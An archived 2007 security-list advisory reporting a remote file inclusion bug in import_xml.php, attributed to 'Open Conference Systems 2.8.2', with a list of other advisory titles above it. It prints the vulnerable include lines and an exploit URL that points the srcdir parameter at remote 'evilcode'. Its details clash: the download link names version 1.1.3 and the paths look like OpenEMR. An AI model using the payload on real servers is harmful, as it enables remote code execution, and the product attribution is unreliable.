Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

AdMentor (banners) admin SQL injection

local Calendar System v1.1 (lcStdLib. inc) Remote File Include

Full Disclosure:  Arbitrary Code Execution in LedgerSMB CVE-2006-5872

FdScript <= v1.3.2 Remote File Disclosure Vulnerability

From:	trzindan_(at)_hotmail.com <trzindan_(at)_hotmail.com>
Date:	28.01.2007
Subject:	Open Conference Systems = 2.8.2 Remote File Inclusion

#########################################################################
# Open Conference Systems <= 2.8.2 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By        : Tr_ZiNDaN
# Location        : TurkeY --  #trzindan@hotmail.fr
########################################################################
file ;
 import_xml.php
 
########################################################################
bugs ;
at -- import_xml.php

include_once("$srcdir/patient.inc");
include_once("$srcdir/acl.inc");

########################################################################
exmple and methode exploit ;
http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode?

########################################################################
Thanks;
str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,Crackers_Child,KurtEfendy,
Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,aLman,k1tk4t ;) MusLim Hackers

########################################################################

T3k T4b4nC4 2oo7~